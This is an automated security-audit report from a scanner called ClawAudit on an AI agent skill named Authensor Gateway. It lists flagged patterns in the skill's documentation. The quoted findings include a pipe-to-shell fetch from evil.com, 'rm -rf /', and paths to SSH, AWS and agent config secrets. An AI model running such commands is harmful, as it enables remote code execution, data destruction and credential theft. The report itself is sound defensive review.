ClawAudit verdict
Authensor Gateway
authensor-gateway
A policy gate skill checking tool calls against a user-configured Authensor policy; credential_access is for the user AUTHENSOR_API_KEY and the skill explicitly states only action metadata is sent to the control plane, never files or secrets.
⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.
Automated static analysis — not a human review. ClawAudit flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.
Permission integrity
credential_access
Findings (7)
Possible hardcoded credential
SKILL.md · code · API_KEY: "authensor_demo_...
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
SKILL.md · prose · downgraded · curl https://evil.com/payload \| sh
Recursive delete from root or home — destructive command
SKILL.md · prose · downgraded · rm -rf /
Pipe to sh — executes piped content as shell commands
SKILL.md · prose · downgraded · | sh
Accesses .ssh directory
SKILL.md · prose · downgraded · .ssh/
Accesses OpenClaw config/secrets directly
SKILL.md · prose · downgraded · ~/.openclaw/openclaw.json
Accesses cloud provider credentials
SKILL.md · prose · downgraded · ~/.aws
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
No declared permissions — minimal attack surface.
credential_access Is this flag fair?
Thanks — recorded.